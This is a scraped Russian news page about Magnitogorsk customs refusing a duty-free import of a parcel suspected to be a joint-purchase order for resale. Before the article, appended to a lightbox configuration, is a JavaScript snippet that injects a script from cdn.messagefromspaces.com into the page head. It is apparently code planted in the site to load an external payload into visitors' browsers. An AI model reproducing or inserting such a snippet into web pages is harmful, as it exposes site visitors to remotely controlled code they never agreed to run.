, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Магнитогорская таможня против совместных закупок

Таможенники Магнитогорска не разрешили горожанину осуществить беспошлинный ввоз посылки из Германии. По словам получателя, в ней содержались детские товары личного пользования, а также подарки для его родственников. Мужчина отрицал, что заказал эти товары для перепродажи и даже подал жалобу на решение таможенной службы.

В ходе разбирательства, однако, было выяснено, что заявитель является активным участником сообщества в социальной сети, посвященного совместным закупкам. На возможность дальнейшей перепродажи указывало и содержимое посыли - в частности, там было пятнадцать упаковок краски для волос 9 разных цветов. Сложно поверить, что все они предназначались в качестве подарков родственникам заявителя.

Пока рано говорить о возможных сложностях для любителей совместных заказов в зарубежных интернет-магазинах - но прецедент уже создан. Возможно, через некотрое время закупаться по оптовым ценам и без учета налогового бремени РФ станет несколько сложнее.

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
12:21 - 04 октября 2013
|
автор: U-RSS
|
(1 468)
|
(0)

Комментарии (0)

Я человек
Я бот